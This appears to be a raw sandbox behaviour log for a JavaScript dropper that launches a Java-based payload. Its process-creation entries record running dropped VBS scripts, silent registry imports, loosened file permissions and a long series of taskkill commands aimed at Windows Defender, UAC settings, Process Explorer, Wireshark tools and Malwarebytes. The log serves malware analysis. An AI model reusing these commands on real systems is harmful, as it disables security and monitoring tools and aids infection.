Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: java.exe	String found in binary or memory: U2]nonvalidating/load-external-dtd
Source: java.exe	String found in binary or memory: Knonvalidating/load-dtd-grammar
Source: java.exe	String found in binary or memory: L'http://apache.org/xml/features/nonvalidating/load-external-dtd

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\gcahfpmhcn.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\cmukyspiy.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.335919510014015658379257619551515348.class
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Source: C:\Windows\SysWOW64\xcopy.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\xcopy.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\system32\regedit.exe" /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\SysWOW64\regedit.exe" /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\cmukyspiy.txt"	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.335919510014015658379257619551515348.class	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs
